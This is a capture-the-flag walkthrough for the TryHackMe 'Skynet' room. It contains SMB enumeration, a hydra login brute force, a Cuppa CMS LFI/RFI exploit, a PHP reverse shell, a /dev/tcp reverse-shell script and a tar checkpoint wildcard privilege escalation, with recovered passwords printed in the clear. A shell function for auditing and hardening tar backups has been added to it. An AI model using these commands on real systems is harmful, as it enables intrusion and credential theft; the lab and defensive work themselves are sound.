Skynet

Room Link: https://tryhackme.com/room/skynet

nmap -A 10.10.13.172
smbclient -L //10.10.13.172
smbget -R smb://10.10.13.172/anonymous
cat logs/log* | sort | uniq  > passwords.txt 

There is also an email from Miles Dyson. As it's just his name, I tried different variations of his name for a username. There is a folder on Samba that could be the username as well: milesdyson.

username.txt

gobuster dir 10.10.13.172 -u http://10.10.13.172 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

hydra -l milesdyson -P passwords.txt 10.10.13.172 http-post-form "/squirrelmail/src/login.php:login_username=^USER^&secretkey=^PASS^&js_autodetect_results=1&just_logged_in=1:F incorrect" -V -F -u

We can now log in to the SquirrelMail instance that gobuster discovered.

Downloaded all the files from the milesdyson folder on smb.

smbget -R smb://10.10.13.172/milesdyson -U milesdyson
Password: )s{A&2Z=F^n_E.B`
gobuster dir 10.10.13.172 -u http://10.10.13.172/45kra24zxs28v3yd/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

None of the passwords or default credentials worked for cuppa.

Found an exploit for cuppa LFI/RFI

searchsploit cuppa
searchsploit -x php/webapps/25971.txt

Testing LFI and it works

http://10.10.13.172/45kra24zxs28v3yd/administrator//alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd

Now we will try RFI to get a reverse shell

Kali #1

Create PHP reverse shell then host the file

python2 -m SimpleHTTPServer 81

Kali #2

nc -lvnp 1337

Browser

http://10.10.13.172/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=http://10.10.243.233:81/revshell.php

Get autocomplete

python -c 'import pty; pty.spawn("/bin/bash")'
ctrl + Z
stty raw -echo;fg

There is a backup script that is run every minute by root, which backs up /var/www/html.

Victim

We can use the following from GTFOBins to get a reverse shell. The checkpoint arguments let us run a command when tar reaches a checkpoint, so we create a reverse shell script in /var/www/html and the command will execute the next time the folder is tar'd.

Exploit Link: https://gtfobins.github.io/gtfobins/tar/

printf '#!/bin/bash\nbash -i >& /dev/tcp/10.10.243.233/1338 0>&1' > /var/www/html/shell
chmod +x /var/www/html/shell
touch /var/www/html/--checkpoint=1
touch /var/www/html/--checkpoint-action=exec=bash\ shell

Kali

nc -nvlp 1338
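
The tar step above only works when the backup job hands tar a shell glob (assumed here, for example `cd /var/www/html && tar cf backup.tgz *`; the room's script is not shown on this page). As an added example, not part of the original write-up, this POSIX shell sketch audits a directory for option-like file names and takes the backup without a glob. The function names are hypothetical.

```shell
#!/bin/sh
# Added example: audit and harden a glob-based tar backup.
# Not the room's backup script; all function names are hypothetical.

# Print top-level entries of DIR whose names start with "-".
# Under `cd DIR && tar cf X *` the shell expands them into argv,
# where tar parses them as options instead of file names.
# Only the top level matters: "*" never expands into subdirectories.
find_option_like_names() {
    dir=$1
    find "$dir" -mindepth 1 -maxdepth 1 -name '-*' -print
}

# Archive DIR into OUT (use an absolute path outside DIR) with no glob.
# tar walks "." itself, so every member is seen as "./name" and can
# never be mistaken for an option.
safe_backup() {
    dir=$1
    out=$2
    tar -czf "$out" -C "$dir" .
}

# What a cron job could call: report suspicious names on stderr so they
# show up in cron mail or logs, then take the backup the safe way.
audit_then_backup() {
    dir=$1
    out=$2
    suspicious=$(find_option_like_names "$dir")
    if [ -n "$suspicious" ]; then
        printf 'WARNING: option-like names in %s:\n%s\n' "$dir" "$suspicious" >&2
    fi
    safe_backup "$dir" "$out"
}
```

If the glob has to stay, `tar -czf "$out" -- *` or `tar -czf "$out" ./*` also stops the names from being parsed as options.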

There is a password in the configuration file. It does not work for root, but we see another user called jjameson in the home directory.

cat /var/www/html/configuration.php

We can log in as jjameson

su jjameson
Password: nv5uz9r3ZEDzVjNu
